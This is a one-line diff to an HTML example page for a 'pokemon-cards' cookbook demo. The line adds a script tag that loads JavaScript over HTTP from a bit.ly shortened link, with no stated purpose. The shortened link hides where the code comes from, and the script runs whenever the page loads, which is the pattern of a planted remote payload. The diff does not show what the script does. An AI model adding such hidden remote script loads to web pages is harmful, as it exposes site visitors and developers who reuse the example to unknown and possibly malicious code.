--- a/cookbook/examples/pokemon-cards/index.html
+++ b/cookbook/examples/pokemon-cards/index.html
@@ -194,5 +194,6 @@
                 </div>
             </div>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
